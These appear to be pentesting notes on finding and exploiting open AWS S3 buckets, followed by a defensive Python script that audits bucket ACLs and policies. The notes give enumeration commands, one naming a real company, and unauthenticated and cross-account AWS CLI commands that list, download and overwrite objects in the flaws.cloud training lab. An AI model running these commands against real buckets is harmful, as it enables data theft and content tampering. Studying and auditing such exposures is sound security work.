S3 Bucket Enumeration
Lazys3 - Ruby Script
ruby lazys3.rb <company>
ruby lazys3.rb pakwheels
Cloud_enum
sudo apt install cloud-enum
cloud_enum -k flaws.cloud --disable-azure --disable-gcp
S3BucketList - Browser Extension
Manual Installation
Exploiting S3 Unauthenticated
sudo apt-get install awscli
cloud_enum -k flaws.cloud --disable-azure --disable-gcp
aws s3 ls s3://flaws.cloud/ --no-sign-request
Download -
aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request
Upload -
aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request
Exploiting S3 Authenticated
Create a free AWS account
Go to AWS IAM dashboard
Users → Add New user with programmatic access credential type
Once the user is created, note down the access key and secret access key
Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess
aws configure --profile someone
aws s3 --profile someone ls s3://flaws.cloud/
aws s3 --profile someone cp s3://flaws.cloud/something.html ./
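A defender-side check for the exposures the two sections above exercise, as an added example that is not part of the original notes: it reads a bucket ACL (as returned by `aws s3api get-bucket-acl`) and a bucket policy document, and reports which of list, download and upload are open to anonymous callers or to any AWS account. The function name, the operation labels and the sample data are assumptions constructed for illustration.

```python
import json

# Global grantee groups that S3 ACLs can reference
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
WHO = {ALL_USERS: "anonymous", AUTH_USERS: "any-aws-account"}
# Bucket ACL permission -> operation from the notes that it makes possible
ACL_OPS = {"READ": ["list"], "WRITE": ["upload"], "FULL_CONTROL": ["list", "upload"]}
# Bucket policy action -> operation
POLICY_OPS = {"s3:ListBucket": ["list"], "s3:GetObject": ["download"],
              "s3:PutObject": ["upload"], "s3:*": ["list", "download", "upload"],
              "*": ["list", "download", "upload"]}

def as_list(value):
    return value if isinstance(value, list) else [value]

def audit_bucket(acl, policy=None):
    """Return a sorted list of (who, operation) exposures (hypothetical helper)."""
    findings = set()
    for grant in acl.get("Grants", []):
        who = WHO.get(grant.get("Grantee", {}).get("URI"))
        if who:
            for op in ACL_OPS.get(grant.get("Permission"), []):
                findings.add((who, op))
    for stmt in as_list((policy or {}).get("Statement", [])):
        principal = stmt.get("Principal")
        wildcard = principal == "*" or (
            isinstance(principal, dict) and "*" in as_list(principal.get("AWS", [])))
        # A Condition may narrow the grant; only unconditional statements are flagged
        if stmt.get("Effect") == "Allow" and wildcard and "Condition" not in stmt:
            for action in as_list(stmt.get("Action", [])):
                for op in POLICY_OPS.get(action, []):
                    findings.add(("anonymous", op))
    return sorted(findings)

# Constructed sample input, not taken from any real bucket
SAMPLE_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "WRITE"}]}
SAMPLE_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [
  {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
   "Resource": "arn:aws:s3:::example-bucket/*"}]}""")

if __name__ == "__main__":
    for who, op in audit_bucket(SAMPLE_ACL, SAMPLE_POLICY):
        print(f"{who}: {op}")
```

Block Public Access settings, which this sketch does not read, can override both the ACL and the policy.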